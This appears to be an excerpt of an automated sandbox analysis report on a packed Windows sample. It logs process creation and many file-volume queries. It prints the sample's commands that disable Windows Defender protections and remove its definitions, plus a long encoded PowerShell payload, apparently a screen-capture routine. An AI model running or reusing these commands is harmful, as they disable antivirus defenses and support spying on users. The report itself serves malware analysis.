buagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA6B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,109_2_00007FF6FAA6B340
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA8DE20 cpuid 109_2_00007FF6FAA8DE20
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\libcrypto-1_1.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\libffi-8.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\libssl-1_1.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\python311.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\sqlite3.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\_decimal.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
